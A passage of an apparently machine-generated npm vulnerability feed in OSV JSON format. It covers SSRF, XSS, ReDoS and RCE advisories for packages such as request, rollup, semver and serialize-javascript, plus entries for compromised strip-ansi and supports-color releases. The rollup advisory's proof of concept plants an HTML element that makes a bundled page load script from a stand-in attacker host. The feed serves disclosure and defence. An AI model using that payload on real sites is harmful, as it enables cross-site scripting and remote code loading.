"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/11/GHSA-7xfp-9c55-5vqj/GHSA-7xfp-9c55-5vqj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-16026" }, { "type": "WEB", "url": "https://github.com/request/request/issues/1904" }, { "type": "WEB", "url": "https://github.com/request/request/pull/2018" }, { "type": "WEB", "url": "https://github.com/request/request/pull/2022" }, { "type": "WEB", 
"url": "https://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd" }, { "type": "PACKAGE", "url": "https://github.com/request/request" } ], "database_specific": { "cwe_ids": [ "CWE-201" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:23:42Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p8p7-x288-28g6", "published": "2023-03-16T15:30:19Z", "modified": "2024-03-21T17:47:20Z", "aliases": [ "CVE-2023-28155" ], "related": [ "CGA-qqwm-8ppm-96fx", "CGA-rw88-hxpr-jw8v" ], "summary": "Server-Side Request Forgery in Request", "details": "The `request` package through 2.88.2 for Node.js and the `@cypress/request` package prior to 3.0.0 allow a bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP).\n\nNOTE: The `request` package is no longer supported by the maintainer.", "affected": [ { "package": { "name": "request", "ecosystem": "npm", "purl": "pkg:npm/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "2.88.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-p8p7-x288-28g6/GHSA-p8p7-x288-28g6.json" } }, { "package": { "name": "@cypress/request", "ecosystem": "npm", "purl": "pkg:npm/%40cypress/request" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.88.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/03/GHSA-p8p7-x288-28g6/GHSA-p8p7-x288-28g6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-28155" }, { "type": "WEB", "url": 
"https://github.com/request/request/issues/3442" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/pull/28" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/2500" }, { "type": "WEB", "url": "https://github.com/request/request/pull/3444" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/commit/c5bcf21d40fb61feaff21a0e5a2b3934a440024f" }, { "type": "WEB", "url": "https://doyensec.com/resources/Doyensec_Advisory_RequestSSRF_Q12023.pdf" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/blob/master/lib/redirect.js#L116" }, { "type": "WEB", "url": "https://github.com/cypress-io/request/releases/tag/v3.0.0" }, { "type": "PACKAGE", "url": "https://github.com/request/request" }, { "type": "WEB", "url": "https://github.com/request/request/blob/master/lib/redirect.js#L111" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230413-0007" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "github_reviewed_at": "2023-03-16T18:33:48Z", "nvd_published_at": "2023-03-16T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gcx4-mw62-g8wm", "published": "2024-09-23T22:11:02Z", "modified": "2024-09-26T21:11:53Z", "aliases": [ "CVE-2024-47068" ], "related": [ "CGA-h8jq-gmpr-v5fp", "CGA-w3cq-r6w2-f8xg" ], "summary": "DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS", "details": "### Summary\n\nWe discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use `import.meta.url` or with plugins that emit and reference asset files from code in `cjs`/`umd`/`iife` format. 
The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present.\n\nIt's worth noting that we’ve identified similar issues in other popular bundlers like Webpack ([CVE-2024-43788](https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986)), which might serve as a good reference.\n\n### Details\n\n#### Backgrounds\n\nDOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markup in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. For more information about DOM Clobbering, here are some references:\n\n[1] https://scnps.co/papers/sp23_domclob.pdf\n[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/\n\n#### Gadget found in `rollup`\n\nWe have identified a DOM Clobbering vulnerability in `rollup` bundled scripts, particularly when the scripts use `import.meta` and the output format is set to `cjs`/`umd`/`iife`. In such cases, `rollup` replaces the meta property with the URL retrieved from `document.currentScript`.\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162\n\nhttps://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185\n\nHowever, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. 
When this happens, the `src` attribute of the attacker-controlled element (e.g., an `img` tag) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.\n\n### PoC\n\nConsider a website that contains the following `main.js` script, where the developer decides to use `rollup` to bundle the program: `rollup main.js --format cjs --file bundle.js`.\n\n```\nvar s = document.createElement('script')\ns.src = import.meta.url + 'extra.js'\ndocument.head.append(s)\n```\n\nThe output `bundle.js` is shown in the following code snippet.\n\n```\n'use strict';\n\nvar _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;\nvar s = document.createElement('script');\ns.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript \u0026\u0026 False \u0026\u0026 _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';\ndocument.head.append(s);\n```\n\nAdding the `rollup` bundled script, `bundle.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server` due to the introduced gadget during bundling. The attacker only needs to insert an `img` tag with the name attribute set to `currentScript`. 
This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\n \u003ctitle\u003erollup Example\u003c/title\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element starts--!\u003e\n \u003cimg name=\"currentScript\" src=\"https://attacker.controlled.server/\"\u003e\u003c/img\u003e\n \u003c!-- Attacker-controlled Script-less HTML Element ends--!\u003e\n\u003c/head\u003e\n\u003cscript type=\"module\" crossorigin src=\"bundle.js\"\u003e\u003c/script\u003e\n\u003cbody\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nThis vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of `cjs`, `iife`, or `umd` and use `import.meta`) and allow users to inject certain scriptless HTML tags without properly sanitizing the `name` or `id` attributes.\n\n### Patch\n\nPatching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.\n\n```\nconst getRelativeUrlFromDocument = (relativePath: string, umd = false) =\u003e\n\tgetResolveUrl(\n\t\t`'${escapeId(relativePath)}', ${\n\t\t\tumd ? `typeof document === 'undefined' ? location.href : ` : ''\n\t\t}document.currentScript \u0026\u0026 document.currentScript.tagName.toUpperCase() === 'SCRIPT' \u0026\u0026 document.currentScript.src || document.baseURI`\n\t);\n```\n\n```\nconst getUrlFromDocument = (chunkId: string, umd = false) =\u003e\n\t`${\n\t\tumd ? `typeof document === 'undefined' ? 
location.href : ` : ''\n\t}(${DOCUMENT_CURRENT_SCRIPT} \u0026\u0026 ${DOCUMENT_CURRENT_SCRIPT}.tagName.toUpperCase() === 'SCRIPT' \u0026\u0026${DOCUMENT_CURRENT_SCRIPT}.src || new URL('${escapeId(\n\t\tchunkId\n\t)}', document.baseURI).href)`;\n```\n", "affected": [ { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.29.5" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } }, { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.22.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } }, { "package": { "name": "rollup", "ecosystem": "npm", "purl": "pkg:npm/rollup" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.79.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-gcx4-mw62-g8wm/GHSA-gcx4-mw62-g8wm.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/rollup/rollup/security/advisories/GHSA-gcx4-mw62-g8wm" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47068" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/commit/2ef77c00ec2635d42697cff2c0567ccc8db34fb4" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/commit/e2552c9e955e0a61f70f508200ee9f752f85a541" }, { "type": "PACKAGE", "url": "https://github.com/rollup/rollup" }, { "type": "WEB", "url": "https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162" }, { "type": "WEB", "url": 
"https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-09-23T22:11:02Z", "nvd_published_at": "2024-09-23T16:15:06Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2qf-rxjj-qqgw", "published": "2023-06-21T06:30:28Z", "modified": "2024-12-06T20:34:31Z", "aliases": [ "CVE-2022-25883" ], "related": [ "CGA-xmx9-rvv8-j9xq" ], "summary": "semver vulnerable to Regular Expression Denial of Service", "details": "Versions of the package semver before 7.5.2 on the 7.x branch, before 6.3.1 on the 6.x branch, and all other versions before 5.7.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range.", "affected": [ { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.5.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } }, { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.3.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } }, { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "5.7.2" } ] } ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/06/GHSA-c2qf-rxjj-qqgw/GHSA-c2qf-rxjj-qqgw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25883" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/564" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/585" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/pull/593" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/2f8fd41487acf380194579ecb6f8b1bbfe116be0" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/717534ee353682f3bcf33e60a8af4292626d4441" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/commit/928e56d21150da0413a3333a3148b20e741a920c" }, { "type": "PACKAGE", "url": "https://github.com/npm/node-semver" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/classes/range.js#L97-L104" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/classes/range.js%23L97-L104" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js#L138" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js#L160" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js%23L138" }, { "type": "WEB", "url": "https://github.com/npm/node-semver/blob/main/internal/re.js%23L160" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241025-0004" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JS-SEMVER-3247795" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2023-06-22T16:52:56Z", "nvd_published_at": "2023-06-21T05:15:09Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x6fg-f45m-jf5q", "published": "2017-10-24T18:33:36Z", 
"modified": "2023-11-08T03:58:03.440077Z", "aliases": [ "CVE-2015-8855" ], "summary": "Regular Expression Denial of Service in semver", "details": "Versions 4.3.1 and earlier of `semver` are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.\n\n\n\n## Recommendation\n\nUpdate to version 4.3.2 or later", "affected": [ { "package": { "name": "semver", "ecosystem": "npm", "purl": "pkg:npm/semver" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-x6fg-f45m-jf5q/GHSA-x6fg-f45m-jf5q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8855" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-x6fg-f45m-jf5q" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/31" }, { "type": "WEB", "url": "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/86957" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:02:25Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-76p7-773f-r4q5", "published": "2025-02-10T18:30:47Z", "modified": "2025-06-05T00:31:18Z", "aliases": [ "CVE-2024-11831" ], "related": [ "CGA-72hf-gjp2-m4hx" ], "summary": "Cross-site Scripting (XSS) in serialize-javascript", "details": "A flaw was found in npm-serialize-javascript. 
The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "6.0.0" }, { "fixed": "6.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/02/GHSA-76p7-773f-r4q5/GHSA-76p7-773f-r4q5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11831" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/pull/173" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/7f3ac252d86b802454cb43782820aea2e0f6dc25" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/f27d65d3de42affe2aac14607066c293891cec4e" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2025:0304" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:1334" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:1468" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:4511" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8059" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8479" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8544" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:8551" }, { "type": "WEB", "url": 
"https://access.redhat.com/security/cve/CVE-2024-11831" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312579" }, { "type": "PACKAGE", "url": "https://github.com/yahoo/serialize-javascript" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2025-02-10T21:19:59Z", "nvd_published_at": "2025-02-10T16:15:37Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h9rv-jmmf-4pgx", "published": "2019-12-05T18:44:37Z", "modified": "2023-11-08T04:01:20.904735Z", "aliases": [ "CVE-2019-16769" ], "related": [ "CVE-2019-16769" ], "summary": "Cross-Site Scripting in serialize-javascript", "details": "Versions of `serialize-javascript` prior to 2.1.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications.\n\n\n## Recommendation\n\nUpgrade to version 2.1.1 or later.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.1.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-h9rv-jmmf-4pgx/GHSA-h9rv-jmmf-4pgx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-h9rv-jmmf-4pgx" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-16769" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-h9rv-jmmf-4pgx" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/1426" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:39:51Z", "nvd_published_at": null, "severity": "MODERATE" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hxcc-f52p-wc94", "published": "2020-08-11T17:21:13Z", "modified": "2023-11-08T04:04:03.301649Z", "aliases": [ "CVE-2020-7660" ], "summary": "Insecure serialization leading to RCE in serialize-javascript", "details": "serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function \"deleteFunctions\" within \"index.js\". \n\nAn object such as `{\"foo\": /1\"/, \"bar\": \"a\\\"@__R-\u003cUID\u003e-0__@\"}` was serialized as `{\"foo\": /1\"/, \"bar\": \"a\\/1\"/}`, which allows an attacker to escape the `bar` key. This requires the attacker to control the values of both `foo` and `bar` and guess the value of `\u003cUID\u003e`. The UID has a keyspace of approximately 4 billion making it a realistic network attack.", "affected": [ { "package": { "name": "serialize-javascript", "ecosystem": "npm", "purl": "pkg:npm/serialize-javascript" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.1.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-hxcc-f52p-wc94/GHSA-hxcc-f52p-wc94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7660" }, { "type": "WEB", "url": "https://github.com/yahoo/serialize-javascript/commit/f21a6fb3ace2353413761e79717b2d210ba6ccbd" }, { "type": "PACKAGE", "url": "https://github.com/yahoo/serialize-javascript" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-08-11T14:14:51Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2m39-62fm-q8r3", "published": "2018-08-15T13:22:23Z", "modified": "2023-11-08T04:00:18.101194Z", 
"aliases": [ "CVE-2018-3737" ], "summary": "Regular Expression Denial of Service in sshpk", "details": "Versions of `sshpk` before 1.13.2 or 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys.\n\n\n## Recommendation\n\nUpdate to version 1.13.2, 1.14.1 or later.", "affected": [ { "package": { "name": "sshpk", "ecosystem": "npm", "purl": "pkg:npm/sshpk" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.13.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/08/GHSA-2m39-62fm-q8r3/GHSA-2m39-62fm-q8r3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-3737" }, { "type": "WEB", "url": "https://github.com/joyent/node-sshpk/commit/46065d38a5e6d1bccf86d3efb2fb83c14e3f9957" }, { "type": "WEB", "url": "https://hackerone.com/reports/319593" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-2m39-62fm-q8r3" }, { "type": "WEB", "url": "https://github.com/joyent/node-sshpk/blob/v1.13.1/lib/formats/ssh.js#L17" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/606" } ], "database_specific": { "cwe_ids": [ "CWE-185", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:52:29Z", "nvd_published_at": "2018-06-07T02:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46980", "published": "2025-09-08T17:14:19Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-vfjc-p7x3-q864" ], "summary": "Malicious code in strip-ansi (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. 
Do not edit below this line.=-_\n\n## Source: ghsa-malware (3736bb5cc515b07f47ad6b5bb06c367271994c4b6606f1ddeb91a056788c34c2)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "strip-ansi", "ecosystem": "npm", "purl": "pkg:npm/strip-ansi" }, "versions": [ "7.1.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/strip-ansi/MAL-2025-46980.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-vfjc-p7x3-q864" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-09T00:35:48.417988007Z", "modified_time": "2025-09-08T18:22:51Z", "sha256": 
"3736bb5cc515b07f47ad6b5bb06c367271994c4b6606f1ddeb91a056788c34c2", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-10T00:34:05.234284619Z", "modified_time": "2025-09-08T18:22:51Z", "sha256": "b9f36a9a8b8c75ed8926b3ceb034acefa7453d1217cef20a4f5d61388ab51f12", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-11T00:34:35.487371486Z", "modified_time": "2025-09-10T17:53:32Z", "sha256": "d1a76aaa14b97e80e6fda1c933066728d98ae6717da55eb385cb356dcad097be", "source": "ghsa-malware", "versions": [ "7.1.1" ] }, { "id": "GHSA-vfjc-p7x3-q864", "import_time": "2025-09-12T00:33:58.10631928Z", "modified_time": "2025-09-10T17:53:32Z", "sha256": "e63c6c35fc417d7362b55829617faa7c8e8f920a33c2acda915ae3ab42337209", "source": "ghsa-malware", "versions": [ "7.1.1" ] } ] }, "credits": [ { "name": "Amazon Inspector", "contact": [ "actran@amazon.com" ], "type": "FINDER" } ] }, { "schema_version": "1.7.3", "id": "MAL-2025-46981", "published": "2025-09-08T17:16:42Z", "modified": "2025-09-12T01:13:35Z", "aliases": [ "GHSA-pj3j-3w3f-j752" ], "summary": "Malicious code in supports-color (npm)", "details": "The package was compromised and malicious code added.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: ghsa-malware (52d7b5f7535b1ec1964ec7f0a7019898a143639f62bf70f6a5e6b9e2ca580c12)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. 
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n", "affected": [ { "package": { "name": "supports-color", "ecosystem": "npm", "purl": "pkg:npm/supports-color" }, "versions": [ "10.2.1" ], "database_specific": { "cwes": [ { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" }, { "cweId": "CWE-506", "description": "The product contains code that appears to be malicious in nature.", "name": "Embedded Malicious Code" } ], "source": "https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/supports-color/MAL-2025-46981.json" } } ], "references": [ { "type": "ARTICLE", "url": "https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised" }, { "type": "ARTICLE", "url": "https://www.bleepingcomputer.com/news/security/hackers-hijack-npm-packages-with-2-billion-weekly-downloads-in-supply-chain-attack/" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-pj3j-3w3f-j752" } ], "database_specific": { "malicious-packages-origins": [ { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-09T00:35:48.417272496Z", "modified_time": "2025-09-08T18:22:23Z", "sha256": "52d7b5f7535b1ec1964ec7f0a7019898a143639f62bf70f6a5e6b9e2ca580c12", "source": "ghsa-malware", "versions": [ "10.2.1" ] }, { "id": "GHSA-pj3j-3w3f-j752", "import_time": "2025-09-10T00:34:05.232662764Z", "modified_time": "2025-09-08T18:22:23Z", "sha256": "6edf0d38ed37ebe4b548be0aeea65438e663532c91f0e021f1981d03f254e638", "source": "ghsa-malware", 
